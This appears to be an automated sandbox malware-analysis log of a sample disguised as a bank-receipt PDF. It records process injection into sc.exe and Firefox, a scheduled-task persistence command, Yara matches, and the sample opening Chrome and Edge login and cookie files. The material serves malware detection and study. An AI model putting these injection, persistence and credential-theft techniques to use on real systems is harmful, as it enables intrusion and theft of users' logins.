Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe NtTerminateThread: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Memory written: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Memory written: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\sc.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: read write
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\sc.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Section loaded: NULL target: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe protection: execute and read and write
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: NULL target: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe protection: execute and read and write
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Section loaded: NULL target: C:\Windows\SysWOW64\sc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\sc.exe Thread APC queued: target process: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe
Source: C:\Windows\SysWOW64\sc.exe Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp566C.tmp"
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Process created: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe "C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe"
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OkLsTLaTTZVp" /XML "C:\Users\user\AppData\Local\Temp\tmp6A22.tmp"
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Process created: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe "C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe"
Source: C:\Program Files (x86)\lMrsFaZtIHxsydIteCamjNxAcldBeoDWTXWtXDtyOrcuniOBQzOlkosufHKzhKUlRkaqQ\IiPvZGpNYiTIbQIQLaPZIDOIY.exe Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
Source: C:\Windows\SysWOW64\sc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000000.2098114142.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 0000000D.00000002.4520770682.0000000000C70000.00000002.00000001.00040000.00000000.sdmp, IiPvZGpNYiTIbQIQLaPZIDOIY.exe, 00000012.00000002.4520497051.0000000001A60000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OkLsTLaTTZVp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Axis Bank - 67 Account Pending Bank Receipt.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.6a70000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.249674c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.OkLsTLaTTZVp.exe.2e766ac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2095435358.0000000006A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2120592413.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2075185488.0000000002471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\sc.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\sc.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.Axis Bank - 67 Account Pending Bank Receipt.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.4510906943.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.4523355689.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2177190183.00000000018A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2296111167.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2178313752.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2176518453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521932134.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2297091636.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.4521296649.0000000003100000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.4521828690.0000000002D20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.4521230365.0000000003110000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
